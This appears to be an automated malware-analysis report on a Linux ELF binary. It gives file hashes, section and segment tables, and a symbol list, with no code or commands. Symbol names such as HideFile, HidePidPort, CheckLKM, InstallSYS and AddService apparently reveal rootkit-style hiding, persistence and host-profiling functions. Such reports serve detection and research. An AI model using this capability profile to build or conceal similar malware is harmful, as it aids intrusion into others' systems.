MD5:	ee5edcc4d824db63a8c8264a8631f067
SHA1:	ce483e6b254cc3ed3ede2e1fee3f959cc4eddbe8
SHA256:	b84cf164fde12dd07192aa44f1b943044610539fd979e0f9359d44062f21a612
SHA512:	4a3b98bbea252e8980fc4133eb026a6c673313c6b92a6fc865481c79321cdf24446f651973efbf01fe06794d397d076accedf99b07da0c08d32d3fa4e382bc54
SSDEEP:	12288:UB1tATMVAqnf+ExxBHYpmA38X8LYkCW6Ti4x6yB1/iGK4UlUuTh1AG:UB1BVpmExDYp38X8LYTWh4fNiGQl/91h
TLSH:	61D47D06F282EAF7C8570970124BF7BF4230E2359412DF8AB6889D1AB9379F5664D317
File Content Preview:	.ELF........................4...hq......4. ...(.....................k`..k`..............l`..l...l........r.......................... ... ...............l`..l...l.......@...........Q.td........................................GNU.................U......5...

Static ELF Info

ELF header
Class:
Data:
Version:
Machine:
Version Number:
Type:
OS/ABI:
ABI Version:
Entry Point Address:
Flags:
ELF Header Size:
Program Header Offset:
Program Header Size:
Number of Program Headers:
Section Header Offset:
Section Header Size:
Number of Section Headers:
Header String Table Index:

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Link	Info	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0	0	0
.note.ABI-tag	NOTE	0x80480d4	0xd4	0x20	0x0	0x2	A	0	0	4
.init	PROGBITS	0x80480f4	0xf4	0x17	0x0	0x6	AX	0	0	4
.text	PROGBITS	0x8048110	0x110	0x69728	0x0	0x6	AX	0	0	16
__libc_freeres_fn	PROGBITS	0x80b1840	0x69840	0x100f	0x0	0x6	AX	0	0	16
__libc_thread_freeres_fn	PROGBITS	0x80b2850	0x6a850	0x1db	0x0	0x6	AX	0	0	16
.fini	PROGBITS	0x80b2a2c	0x6aa2c	0x1c	0x0	0x6	AX	0	0	4
.rodata	PROGBITS	0x80b2a60	0x6aa60	0x153c0	0x0	0x2	A	0	0	32
__libc_subfreeres	PROGBITS	0x80c7e20	0x7fe20	0x30	0x0	0x2	A	0	0	4
__libc_atexit	PROGBITS	0x80c7e50	0x7fe50	0x4	0x0	0x2	A	0	0	4
__libc_thread_subfreeres	PROGBITS	0x80c7e54	0x7fe54	0x8	0x0	0x2	A	0	0	4
.eh_frame	PROGBITS	0x80c7e5c	0x7fe5c	0x60f4	0x0	0x2	A	0	0	4
.gcc_except_table	PROGBITS	0x80cdf50	0x85f50	0x11b	0x0	0x2	A	0	0	1
.tdata	PROGBITS	0x80cf06c	0x8606c	0x14	0x0	0x403	WAT	0	0	4
.tbss	NOBITS	0x80cf080	0x86080	0x2c	0x0	0x403	WAT	0	0	4
.ctors	PROGBITS	0x80cf080	0x86080	0x8	0x0	0x3	WA	0	0	4
.dtors	PROGBITS	0x80cf088	0x86088	0xc	0x0	0x3	WA	0	0	4
.jcr	PROGBITS	0x80cf094	0x86094	0x4	0x0	0x3	WA	0	0	4
.data.rel.ro	PROGBITS	0x80cf098	0x86098	0x2c	0x0	0x3	WA	0	0	4
.got	PROGBITS	0x80cf0c4	0x860c4	0x8	0x4	0x3	WA	0	0	4
.got.plt	PROGBITS	0x80cf0cc	0x860cc	0xc	0x4	0x3	WA	0	0	4
.data	PROGBITS	0x80cf0e0	0x860e0	0xb40	0x0	0x3	WA	0	0	32
.bss	NOBITS	0x80cfc20	0x86c20	0x6718	0x0	0x3	WA	0	0	32
__libc_freeres_ptrs	NOBITS	0x80d6338	0x86c20	0x14	0x0	0x3	WA	0	0	4
.comment	PROGBITS	0x0	0x86c20	0x422	0x0	0x0		0	0	1
.shstrtab	STRTAB	0x0	0x87042	0x126	0x0	0x0		0	0	1
.symtab	SYMTAB	0x0	0x875c8	0x93c0	0x10	0x0		27	914	4
.strtab	STRTAB	0x0	0x90988	0x82a3	0x0	0x0		0	0	1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x8048000	0x8048000	0x8606b	0x8606b	6.1952	0x5	R E	0x1000	.note.ABI-tag .init .text __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata __libc_subfreeres __libc_atexit __libc_thread_subfreeres .eh_frame .gcc_except_table
LOAD	0x8606c	0x80cf06c	0x80cf06c	0xbb4	0x72e0	3.6705	0x6	RW	0x1000	.tdata .tbss .ctors .dtors .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs
NOTE	0xd4	0x80480d4	0x80480d4	0x20	0x20	1.7487	0x4	R	0x4	.note.ABI-tag
TLS	0x8606c	0x80cf06c	0x80cf06c	0x14	0x40	2.8414	0x4	R	0x4	.tdata .tbss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Symbols

Name	Section Name	Value	Size	Symbol Type	Symbol Bind	Symbol Visibility	Ndx
	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
	.symtab	0x80480d4	0	SECTION	<unknown>	DEFAULT	1
	.symtab	0x80480f4	0	SECTION	<unknown>	DEFAULT	2
	.symtab	0x8048110	0	SECTION	<unknown>	DEFAULT	3
	.symtab	0x80b1840	0	SECTION	<unknown>	DEFAULT	4
	.symtab	0x80b2850	0	SECTION	<unknown>	DEFAULT	5
	.symtab	0x80b2a2c	0	SECTION	<unknown>	DEFAULT	6
	.symtab	0x80b2a60	0	SECTION	<unknown>	DEFAULT	7
	.symtab	0x80c7e20	0	SECTION	<unknown>	DEFAULT	8
	.symtab	0x80c7e50	0	SECTION	<unknown>	DEFAULT	9
	.symtab	0x80c7e54	0	SECTION	<unknown>	DEFAULT	10
	.symtab	0x80c7e5c	0	SECTION	<unknown>	DEFAULT	11
	.symtab	0x80cdf50	0	SECTION	<unknown>	DEFAULT	12
	.symtab	0x80cf06c	0	SECTION	<unknown>	DEFAULT	13
	.symtab	0x80cf080	0	SECTION	<unknown>	DEFAULT	14
	.symtab	0x80cf080	0	SECTION	<unknown>	DEFAULT	15
	.symtab	0x80cf088	0	SECTION	<unknown>	DEFAULT	16
	.symtab	0x80cf094	0	SECTION	<unknown>	DEFAULT	17
	.symtab	0x80cf098	0	SECTION	<unknown>	DEFAULT	18
	.symtab	0x80cf0c4	0	SECTION	<unknown>	DEFAULT	19
	.symtab	0x80cf0cc	0	SECTION	<unknown>	DEFAULT	20
	.symtab	0x80cf0e0	0	SECTION	<unknown>	DEFAULT	21
	.symtab	0x80cfc20	0	SECTION	<unknown>	DEFAULT	22
	.symtab	0x80d6338	0	SECTION	<unknown>	DEFAULT	23
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	24
.L108	.symtab	0x80ad8a0	0	NOTYPE	<unknown>	DEFAULT	3
.L113	.symtab	0x80ad8e0	0	NOTYPE	<unknown>	DEFAULT	3
.L114	.symtab	0x80ad948	0	NOTYPE	<unknown>	DEFAULT	3
.L115	.symtab	0x80ad980	0	NOTYPE	<unknown>	DEFAULT	3
.L116	.symtab	0x80ad99e	0	NOTYPE	<unknown>	DEFAULT	3
.L117	.symtab	0x80ad9bc	0	NOTYPE	<unknown>	DEFAULT	3
.L118	.symtab	0x80ad9d9	0	NOTYPE	<unknown>	DEFAULT	3
.L119	.symtab	0x80ada0d	0	NOTYPE	<unknown>	DEFAULT	3
.L12	.symtab	0x80b125b	0	NOTYPE	<unknown>	DEFAULT	3
.L120	.symtab	0x80ada2c	0	NOTYPE	<unknown>	DEFAULT	3
.L121	.symtab	0x80ada4b	0	NOTYPE	<unknown>	DEFAULT	3
.L122	.symtab	0x80ad833	0	NOTYPE	<unknown>	DEFAULT	3
.L123	.symtab	0x80ada7b	0	NOTYPE	<unknown>	DEFAULT	3
.L124	.symtab	0x80adccf	0	NOTYPE	<unknown>	DEFAULT	3
.L125	.symtab	0x80add04	0	NOTYPE	<unknown>	DEFAULT	3
.L126	.symtab	0x80adc52	0	NOTYPE	<unknown>	DEFAULT	3
.L127	.symtab	0x80adc6f	0	NOTYPE	<unknown>	DEFAULT	3
.L128	.symtab	0x80adc96	0	NOTYPE	<unknown>	DEFAULT	3
.L129	.symtab	0x80adcb3	0	NOTYPE	<unknown>	DEFAULT	3
.L130	.symtab	0x80adadc	0	NOTYPE	<unknown>	DEFAULT	3
.L131	.symtab	0x80adb23	0	NOTYPE	<unknown>	DEFAULT	3
.L132	.symtab	0x80adb50	0	NOTYPE	<unknown>	DEFAULT	3
.L133	.symtab	0x80adb87	0	NOTYPE	<unknown>	DEFAULT	3
.L134	.symtab	0x80adba0	0	NOTYPE	<unknown>	DEFAULT	3
.L135	.symtab	0x80adbcd	0	NOTYPE	<unknown>	DEFAULT	3
.L136	.symtab	0x80adc05	0	NOTYPE	<unknown>	DEFAULT	3
.L137	.symtab	0x80adc19	0	NOTYPE	<unknown>	DEFAULT	3
.L14	.symtab	0x80b1369	0	NOTYPE	<unknown>	DEFAULT	3
.L15	.symtab	0x80b1358	0	NOTYPE	<unknown>	DEFAULT	3
.L16	.symtab	0x80b1348	0	NOTYPE	<unknown>	DEFAULT	3
.L17	.symtab	0x80b1338	0	NOTYPE	<unknown>	DEFAULT	3
.L18	.symtab	0x80b12dc	0	NOTYPE	<unknown>	DEFAULT	3
.L19	.symtab	0x80b12ce	0	NOTYPE	<unknown>	DEFAULT	3
.L20	.symtab	0x80b1295	0	NOTYPE	<unknown>	DEFAULT	3
.L21	.symtab	0x80b12c1	0	NOTYPE	<unknown>	DEFAULT	3
.L258	.symtab	0x80ae6bc	0	NOTYPE	<unknown>	DEFAULT	3
.L259	.symtab	0x80ae3f0	0	NOTYPE	<unknown>	DEFAULT	3
.L260	.symtab	0x80ae547	0	NOTYPE	<unknown>	DEFAULT	3
.L261	.symtab	0x80ae710	0	NOTYPE	<unknown>	DEFAULT	3
.L262	.symtab	0x80ae539	0	NOTYPE	<unknown>	DEFAULT	3
.L264	.symtab	0x80ae38d	0	NOTYPE	<unknown>	DEFAULT	3
.L266	.symtab	0x80ae3e6	0	NOTYPE	<unknown>	DEFAULT	3
.L267	.symtab	0x80ae5df	0	NOTYPE	<unknown>	DEFAULT	3
.L268	.symtab	0x80ae5f0	0	NOTYPE	<unknown>	DEFAULT	3
.L269	.symtab	0x80ae555	0	NOTYPE	<unknown>	DEFAULT	3
.L270	.symtab	0x80ae578	0	NOTYPE	<unknown>	DEFAULT	3
.L271	.symtab	0x80ae592	0	NOTYPE	<unknown>	DEFAULT	3
.L272	.symtab	0x80ae5b4	0	NOTYPE	<unknown>	DEFAULT	3
.L273	.symtab	0x80ae3fb	0	NOTYPE	<unknown>	DEFAULT	3
.L274	.symtab	0x80ae434	0	NOTYPE	<unknown>	DEFAULT	3
.L275	.symtab	0x80ae4e9	0	NOTYPE	<unknown>	DEFAULT	3
.L276	.symtab	0x80ae4af	0	NOTYPE	<unknown>	DEFAULT	3
.L277	.symtab	0x80ae52a	0	NOTYPE	<unknown>	DEFAULT	3
.L278	.symtab	0x80ae785	0	NOTYPE	<unknown>	DEFAULT	3
.L279	.symtab	0x80ae71e	0	NOTYPE	<unknown>	DEFAULT	3
.L280	.symtab	0x80ae730	0	NOTYPE	<unknown>	DEFAULT	3
.L281	.symtab	0x80ae607	0	NOTYPE	<unknown>	DEFAULT	3
.L282	.symtab	0x80ae65c	0	NOTYPE	<unknown>	DEFAULT	3
.L283	.symtab	0x80ae3b7	0	NOTYPE	<unknown>	DEFAULT	3
.L350	.symtab	0x80ae790	0	NOTYPE	<unknown>	DEFAULT	3
.L351	.symtab	0x80ae79a	0	NOTYPE	<unknown>	DEFAULT	3
.L352	.symtab	0x80ae7a9	0	NOTYPE	<unknown>	DEFAULT	3
.L353	.symtab	0x80ae7b3	0	NOTYPE	<unknown>	DEFAULT	3
.L354	.symtab	0x80ae7c2	0	NOTYPE	<unknown>	DEFAULT	3
.L355	.symtab	0x80ae7cd	0	NOTYPE	<unknown>	DEFAULT	3
.L356	.symtab	0x80ae7d7	0	NOTYPE	<unknown>	DEFAULT	3
.L357	.symtab	0x80ae7e2	0	NOTYPE	<unknown>	DEFAULT	3
.L358	.symtab	0x80ae7ee	0	NOTYPE	<unknown>	DEFAULT	3
.L359	.symtab	0x80ae7fa	0	NOTYPE	<unknown>	DEFAULT	3
.L360	.symtab	0x80ae803	0	NOTYPE	<unknown>	DEFAULT	3
.L361	.symtab	0x80ae80d	0	NOTYPE	<unknown>	DEFAULT	3
.L362	.symtab	0x80ae81c	0	NOTYPE	<unknown>	DEFAULT	3
.L363	.symtab	0x80ae82b	0	NOTYPE	<unknown>	DEFAULT	3
.L364	.symtab	0x80ae83a	0	NOTYPE	<unknown>	DEFAULT	3
.L365	.symtab	0x80ae849	0	NOTYPE	<unknown>	DEFAULT	3
.L366	.symtab	0x80ae858	0	NOTYPE	<unknown>	DEFAULT	3
.L380	.symtab	0x80ae388	0	NOTYPE	<unknown>	DEFAULT	3
.L411	.symtab	0x80aea60	0	NOTYPE	<unknown>	DEFAULT	3
.L412	.symtab	0x80aea36	0	NOTYPE	<unknown>	DEFAULT	3
.L413	.symtab	0x80aeaa4	0	NOTYPE	<unknown>	DEFAULT	3
.L414	.symtab	0x80aeb10	0	NOTYPE	<unknown>	DEFAULT	3
.L415	.symtab	0x80aeb70	0	NOTYPE	<unknown>	DEFAULT	3
.L416	.symtab	0x80aebb0	0	NOTYPE	<unknown>	DEFAULT	3
.L61	.symtab	0x80ad5c3	0	NOTYPE	<unknown>	DEFAULT	3
.L63	.symtab	0x80ad63f	0	NOTYPE	<unknown>	DEFAULT	3
.L64	.symtab	0x80ad61e	0	NOTYPE	<unknown>	DEFAULT	3
.L67	.symtab	0x80ad62e	0	NOTYPE	<unknown>	DEFAULT	3
.L68	.symtab	0x80ad626	0	NOTYPE	<unknown>	DEFAULT	3
.L69	.symtab	0x80ad5f2	0	NOTYPE	<unknown>	DEFAULT	3
.L70	.symtab	0x80ad612	0	NOTYPE	<unknown>	DEFAULT	3
.L74	.symtab	0x80afab3	0	NOTYPE	<unknown>	DEFAULT	3
.L76	.symtab	0x80afb2f	0	NOTYPE	<unknown>	DEFAULT	3
.L77	.symtab	0x80afb0e	0	NOTYPE	<unknown>	DEFAULT	3
.L80	.symtab	0x80afb1e	0	NOTYPE	<unknown>	DEFAULT	3
.L81	.symtab	0x80afb16	0	NOTYPE	<unknown>	DEFAULT	3
.L82	.symtab	0x80afae2	0	NOTYPE	<unknown>	DEFAULT	3
.L83	.symtab	0x80afb02	0	NOTYPE	<unknown>	DEFAULT	3
AddService	.symtab	0x8048865	807	FUNC	<unknown>	DEFAULT	3
CalcCrc32	.symtab	0x80492b4	70	FUNC	<unknown>	DEFAULT	3
CalcFileCrc	.symtab	0x8049346	172	FUNC	<unknown>	DEFAULT	3
CalcFindIpCrc	.symtab	0x8049320	38	FUNC	<unknown>	DEFAULT	3
CalcHeaderCrc	.symtab	0x80492fa	38	FUNC	<unknown>	DEFAULT	3
CheckLKM	.symtab	0x804a604	107	FUNC	<unknown>	DEFAULT	3
CreateDir	.symtab	0x80483de	375	FUNC	<unknown>	DEFAULT	3
DNS_ADDR	.symtab	0x80cf42c	16	OBJECT	<unknown>	DEFAULT	21
DNS_ADDR2	.symtab	0x80cf43c	16	OBJECT	<unknown>	DEFAULT	21
DNS_PORT	.symtab	0x80cf44c	4	OBJECT	<unknown>	DEFAULT	21
DelService	.symtab	0x8048cdc	275	FUNC	<unknown>	DEFAULT	3
DelService_form_pid	.symtab	0x8048def	113	FUNC	<unknown>	DEFAULT	3
GetCpuInfo	.symtab	0x804e24e	539	FUNC	<unknown>	DEFAULT	3
GetIndex	.symtab	0x804b3ac	189	FUNC	<unknown>	DEFAULT	3
GetLanSpeed	.symtab	0x804e561	243	FUNC	<unknown>	DEFAULT	3
GetMemStat	.symtab	0x804e159	245	FUNC	<unknown>	DEFAULT	3
Get_AllIP	.symtab	0x804eedd	375	FUNC	<unknown>	DEFAULT	3
HideFile	.symtab	0x804a6e1	151	FUNC	<unknown>	DEFAULT	3
HidePidPort	.symtab	0x804a66f	114	FUNC	<unknown>	DEFAULT	3
InstallSYS	.symtab	0x8048b8c	336	FUNC	<unknown>	DEFAULT	3
LinuxExec	.symtab	0x8048eed	122	FUNC	<unknown>	DEFAULT	3
LinuxExec_Argv	.symtab	0x8048f67	135	FUNC	<unknown>	DEFAULT	3
LinuxExec_Argv2	.symtab	0x8048fee	148	FUNC	<unknown>	DEFAULT	3
LogFacility	.symtab	0x80cf96c	4	OBJECT	<unknown>	DEFAULT	21
LogFile	.symtab	0x80cf968	4	OBJECT	<unknown>	DEFAULT	21
LogMask	.symtab	0x80cf960	4	OBJECT	<unknown>	DEFAULT	21
LogStat	.symtab	0x80d4fa4	4	OBJECT	<unknown>	DEFAULT	22
LogTag	.symtab	0x80d4fa8	4	OBJECT	<unknown>	DEFAULT	22
LogType	.symtab	0x80cf964	4	OBJECT	<unknown>	DEFAULT	21
MAGIC_STR	.symtab	0x80d1ec0	33	OBJECT	<unknown>	DEFAULT	22
MainList	.symtab	0x80d1f00	264	OBJECT	<unknown>	DEFAULT	22
ReadWord	.symtab	0x804e0d0	137	FUNC	<unknown>	DEFAULT	3
SIZE_DNS_H	.symtab	0x80cf404	4	OBJECT	<unknown>	DEFAULT	21
SIZE_DNS_T	.symtab	0x80cf408	4	OBJECT	<unknown>	DEFAULT	21
SIZE_IP_H	.symtab	0x80cf3f8	4	OBJECT	<unknown>	DEFAULT	21
SIZE_PSEUDO_HDR	.symtab	0x80cf40c	4	OBJECT	<unknown>	DEFAULT	21
SIZE_TCP_H	.symtab	0x80cf400	4	OBJECT	<unknown>	DEFAULT	21
SIZE_UDP_H	.symtab	0x80cf3fc	4	OBJECT	<unknown>	DEFAULT	21
SYS_BUF	.symtab	0x80cfc40	1	OBJECT	<unknown>	DEFAULT	22
SyslogAddr	.symtab	0x80d4fc0	110	OBJECT	<unknown>	DEFAULT	22
THREAD_NUM	.symtab	0x80d60d0	4	OBJECT	<unknown>	DEFAULT	22
_Exit	.symtab	0x8067978	19	FUNC	<unknown>	DEFAULT	3
_GLOBAL_OFFSET_TABLE_	.symtab	0x80cf0cc	0	OBJECT	<unknown>	HIDDEN	20
_IO_2_1_stderr_	.symtab	0x80cf660	152	OBJECT	<unknown>	DEFAULT	21
_IO_2_1_stdin_	.symtab	0x80cf520	152	OBJECT	<unknown>	DEFAULT	21
_IO_2_1_stdout_	.symtab	0x80cf5c0	152	OBJECT	<unknown>	DEFAULT	21
_IO_adjust_column	.symtab	0x805c900	60	FUNC	<unknown>	DEFAULT	3
_IO_adjust_wcolumn	.symtab	0x80846c0	63	FUNC	<unknown>	DEFAULT	3
_IO_cleanup	.symtab	0x805d260	409	FUNC	<unknown>	DEFAULT	3
_IO_default_doallocate	.symtab	0x805dd60	143	FUNC	<unknown>	DEFAULT	3
_IO_default_finish	.symtab	0x805e260	525	FUNC	<unknown>	DEFAULT	3
_IO_default_imbue	.symtab	0x805ca10	5	FUNC	<unknown>	DEFAULT	3
_IO_default_pbackfail	.symtab	0x805d850	310	FUNC	<unknown>	DEFAULT	3
_IO_default_read	.symtab	0x805c9e0	10	FUNC	<unknown>	DEFAULT	3
_IO_default_seek	.symtab	0x805c9c0	15	FUNC	<unknown>	DEFAULT	3
_IO_default_seekoff	.symtab	0x805c850	15	FUNC	<unknown>	DEFAULT	3
_IO_default_seekpos	.symtab	0x805c760	59	FUNC	<unknown>	DEFAULT	3
_IO_default_setbuf	.symtab	0x805dc60	244	FUNC	<unknown>	DEFAULT	3
_IO_default_showmanyc	.symtab	0x805ca00	10	FUNC	<unknown>	DEFAULT	3
_IO_default_stat	.symtab	0x805c9d0	10	FUNC	<unknown>	DEFAULT	3
_IO_default_sync	.symtab	0x805c840	7	FUNC	<unknown>	DEFAULT	3
_IO_default_uflow	.symtab	0x805c700	52	FUNC	<unknown>	DEFAULT	3
_IO_default_underflow	.symtab	0x805c6f0	10	FUNC	<unknown>	DEFAULT	3
_IO_default_write	.symtab	0x805c9f0	7	FUNC	<unknown>	DEFAULT	3
_IO_default_xsgetn	.symtab	0x805e1a0	185	FUNC	<unknown>	DEFAULT	3
_IO_default_xsputn	.symtab	0x805cbd0	225	FUNC	<unknown>	DEFAULT	3
_IO_do_write	.symtab	0x805bcd0	271	FUNC	<unknown>	DEFAULT	3
_IO_doallocbuf	.symtab	0x805dbd0	133	FUNC	<unknown>	DEFAULT	3
_IO_fclose	.symtab	0x8057d40	439	FUNC	<unknown>	DEFAULT	3
_IO_feof	.symtab	0x8059620	154	FUNC	<unknown>	DEFAULT	3
_IO_fgets	.symtab	0x8057f40	360	FUNC	<unknown>	DEFAULT	3
_IO_file_attach	.symtab	0x8059d10	133	FUNC	<unknown>	DEFAULT	3
_IO_file_close	.symtab	0x805a890	18	FUNC	<unknown>	DEFAULT	3
_IO_file_close_it	.symtab	0x805b240	581	FUNC	<unknown>	DEFAULT	3
_IO_file_close_mmap	.symtab	0x805a8b0	60	FUNC	<unknown>	DEFAULT	3
_IO_file_doallocate	.symtab	0x8083900	275	FUNC	<unknown>	DEFAULT	3
_IO_file_finish	.symtab	0x805c3f0	327	FUNC	<unknown>	DEFAULT	3
_IO_file_fopen	.symtab	0x805b490	1388	FUNC	<unknown>	DEFAULT	3
_IO_file_init	.symtab	0x805af90	51	FUNC	<unknown>	DEFAULT	3
_IO_file_jumps	.symtab	0x80b3d60	84	OBJECT	<unknown>	DEFAULT	7
_IO_file_jumps_maybe_mmap	.symtab	0x80b3e20	84	OBJECT	<unknown>	DEFAULT	7
_IO_file_jumps_mmap	.symtab	0x80b3dc0	84	OBJECT	<unknown>	DEFAULT	7
_IO_file_open	.symtab	0x805ae80	263	FUNC	<unknown>	DEFAULT	3
_IO_file_overflow	.symtab	0x805bf80	1131	FUNC	<unknown>	DEFAULT	3
_IO_file_read	.symtab	0x805a920	48	FUNC	<unknown>	DEFAULT	3
_IO_file_seek	.symtab	0x8059f20	18	FUNC	<unknown>	DEFAULT	3
_IO_file_seekoff	.symtab	0x805a950	1245	FUNC	<unknown>	DEFAULT	3
_IO_file_seekoff_maybe_mmap	.symtab	0x8059ed0	80	FUNC	<unknown>	DEFAULT	3
_IO_file_seekoff_mmap	.symtab	0x8059da0	297	FUNC	<unknown>	DEFAULT	3
_IO_file_setbuf	.symtab	0x805ae30	75	FUNC	<unknown>	DEFAULT	3
_IO_file_setbuf_mmap	.symtab	0x805b1c0	115	FUNC	<unknown>	DEFAULT	3
_IO_file_stat	.symtab	0x805a8f0	37	FUNC	<unknown>	DEFAULT	3
_IO_file_sync	.symtab	0x805bde0	406	FUNC	<unknown>	DEFAULT	3
_IO_file_sync_mmap	.symtab	0x8059f40	165	FUNC	<unknown>	DEFAULT	3
_IO_file_underflow	.symtab	0x805afd0	495	FUNC	<unknown>	DEFAULT	3
_IO_file_underflow_maybe_mmap	.symtab	0x805a230	30	FUNC	<unknown>	DEFAULT	3
_IO_file_underflow_mmap	.symtab	0x805a600	66	FUNC	<unknown>	DEFAULT	3
_IO_file_write	.symtab	0x805a7e0	166	FUNC	<unknown>	DEFAULT	3
_IO_file_xsgetn	.symtab	0x805a650	394	FUNC	<unknown>	DEFAULT	3
_IO_file_xsgetn_maybe_mmap	.symtab	0x805a1e0	67	FUNC	<unknown>	DEFAULT	3
_IO_file_xsgetn_mmap	.symtab	0x805a500	242	FUNC	<unknown>	DEFAULT	3
_IO_file_xsputn	.symtab	0x805ba00	705	FUNC	<unknown>	DEFAULT	3
_IO_flush_all	.symtab	0x805d400	20	FUNC	<unknown>	DEFAULT	3
_IO_flush_all_linebuffered	.symtab	0x805ce80	448	FUNC	<unknown>	DEFAULT	3
_IO_flush_all_lockp	.symtab	0x805d040	533	FUNC	<unknown>	DEFAULT	3
_IO_fopen	.symtab	0x80581f0	34	FUNC	<unknown>	DEFAULT	3
_IO_fprintf	.symtab	0x8083280	36	FUNC	<unknown>	DEFAULT	3
_IO_free_backup_area	.symtab	0x805cb70	93	FUNC	<unknown>	DEFAULT	3
_IO_free_wbackup_area	.symtab	0x8084740	104	FUNC	<unknown>	DEFAULT	3
_IO_ftell	.symtab	0x8083a20	436	FUNC	<unknown>	DEFAULT	3
_IO_funlockfile	.symtab	0x8083310	47	FUNC	<unknown>	DEFAULT	3
_IO_fwide	.symtab	0x80858a0	323	FUNC	<unknown>	DEFAULT	3
_IO_fwrite	.symtab	0x8083cb0	297	FUNC	<unknown>	DEFAULT	3
_IO_getc	.symtab	0x80597d0	207	FUNC	<unknown>	DEFAULT	3
_IO_getdelim	.symtab	0x8083e00	624	FUNC	<unknown>	DEFAULT	3
_IO_getline	.symtab	0x8058390	55	FUNC	<unknown>	DEFAULT	3
_IO_getline_info	.symtab	0x8058220	353	FUNC	<unknown>	DEFAULT	3
_IO_helper_jumps	.symtab	0x80c29a0	84	OBJECT	<unknown>	DEFAULT	7
_IO_helper_overflow	.symtab	0x8079f10	175	FUNC	<unknown>	DEFAULT	3
_IO_init	.symtab	0x805daa0	163	FUNC	<unknown>	DEFAULT	3
_IO_init_marker	.symtab	0x805ddf0	169	FUNC	<unknown>	DEFAULT	3
_IO_init_wmarker	.symtab	0x8085030	193	FUNC	<unknown>	DEFAULT	3
_IO_iter_begin	.symtab	0x805ca20	10	FUNC	<unknown>	DEFAULT	3
_IO_iter_end	.symtab	0x805ca30	7	FUNC	<unknown>	DEFAULT	3
_IO_iter_file	.symtab	0x805ca50	8	FUNC	<unknown>	DEFAULT	3
_IO_iter_next	.symtab	0x805ca40	11	FUNC	<unknown>	DEFAULT	3
_IO_least_marker	.symtab	0x805c5e0	38	FUNC	<unknown>	DEFAULT	3
_IO_least_wmarker	.symtab	0x80844c0	51	FUNC	<unknown>	DEFAULT	3
_IO_link_in	.symtab	0x805d420	400	FUNC	<unknown>	DEFAULT	3
_IO_list_all	.symtab	0x80cf6f8	4	OBJECT	<unknown>	DEFAULT	21
_IO_list_all_stamp	.symtab	0x80d4a60	4	OBJECT	<unknown>	DEFAULT	22
_IO_list_lock	.symtab	0x805ca60	64	FUNC	<unknown>	DEFAULT	3
_IO_list_resetlock	.symtab	0x805cae0	35	FUNC	<unknown>	DEFAULT	3
_IO_list_unlock	.symtab	0x805caa0	56	FUNC	<unknown>	DEFAULT	3
_IO_marker_delta	.symtab	0x805c990	47	FUNC	<unknown>	DEFAULT	3
_IO_marker_difference	.symtab	0x805c970	17	FUNC	<unknown>	DEFAULT	3
_IO_mem_finish	.symtab	0x8085b00	106	FUNC	<unknown>	DEFAULT	3
_IO_mem_jumps	.symtab	0x80c2e00	84	OBJECT	<unknown>	DEFAULT	7
_IO_mem_sync	.symtab	0x8085ab0	76	FUNC	<unknown>	DEFAULT	3
_IO_new_do_write	.symtab	0x805bcd0	271	FUNC	<unknown>	DEFAULT	3
_IO_new_fclose	.symtab	0x8057d40	439	FUNC	<unknown>	DEFAULT	3
_IO_new_file_attach	.symtab	0x8059d10	133	FUNC	<unknown>	DEFAULT	3
_IO_new_file_close_it	.symtab	0x805b240	581	FUNC	<unknown>	DEFAULT	3
_IO_new_file_finish	.symtab	0x805c3f0	327	FUNC	<unknown>	DEFAULT	3
_IO_new_file_fopen	.symtab	0x805b490	1388	FUNC	<unknown>	DEFAULT	3
_IO_new_file_init	.symtab	0x805af90	51	FUNC	<unknown>	DEFAULT	3
_IO_new_file_overflow	.symtab	0x805bf80	1131	FUNC	<unknown>	DEFAULT	3
_IO_new_file_seekoff	.symtab	0x805a950	1245	FUNC	<unknown>	DEFAULT	3
_IO_new_file_setbuf	.symtab	0x805ae30	75	FUNC	<unknown>	DEFAULT	3
_IO_new_file_sync	.symtab	0x805bde0	406	FUNC	<unknown>	DEFAULT	3
_IO_new_file_underflow	.symtab	0x805afd0	495	FUNC	<unknown>	DEFAULT	3
_IO_new_file_write	.symtab	0x805a7e0	166	FUNC	<unknown>	DEFAULT	3
_IO_new_file_xsputn	.symtab	0x805ba00	705	FUNC	<unknown>	DEFAULT	3
_IO_new_fopen	.symtab	0x80581f0	34	FUNC	<unknown>	DEFAULT	3
_IO_no_init	.symtab	0x805d990	259	FUNC	<unknown>	DEFAULT	3
_IO_old_init	.symtab	0x805c7a0	150	FUNC	<unknown>	DEFAULT	3
_IO_padn	.symtab	0x80840a0	203	FUNC	<unknown>	DEFAULT	3
_IO_remove_marker	.symtab	0x805c940	40	FUNC	<unknown>	DEFAULT	3
_IO_seekmark	.symtab	0x805d790	179	FUNC	<unknown>	DEFAULT	3
_IO_seekoff	.symtab	0x8084250	233	FUNC	<unknown>	DEFAULT	3
_IO_seekoff_unlocked	.symtab	0x8084170	224	FUNC	<unknown>	DEFAULT	3
_IO_seekwmark	.symtab	0x8084c90	181	FUNC	<unknown>	DEFAULT	3
_IO_setb	.symtab	0x805cb10	93	FUNC	<unknown>	DEFAULT	3
_IO_sgetn	.symtab	0x805c740	18	FUNC	<unknown>	DEFAULT	3
_IO_sputbackc	.symtab	0x805c860	75	FUNC	<unknown>	DEFAULT	3
_IO_sputbackwc	.symtab	0x8084620	73	FUNC	<unknown>	DEFAULT	3
_IO_sscanf	.symtab	0x80832e0	36	FUNC	<unknown>	DEFAULT	3
_IO_stderr	.symtab	0x80cf944	4	OBJECT	<unknown>	HIDDEN	21
_IO_stdfile_0_lock	.symtab	0x80d4a70	12	OBJECT	<unknown>	DEFAULT	22
_IO_stdfile_1_lock	.symtab	0x80d4a7c	12	OBJECT	<unknown>	DEFAULT	22
_IO_stdfile_2_lock	.symtab	0x80d4a88	12	OBJECT	<unknown>	DEFAULT	22
_IO_stdin	.symtab	0x80cf93c	4	OBJECT	<unknown>	HIDDEN	21
_IO_stdin_used	.symtab	0x80b2a64	4	OBJECT	<unknown>	DEFAULT	7
_IO_stdout	.symtab	0x80cf940	4	OBJECT	<unknown>	HIDDEN	21
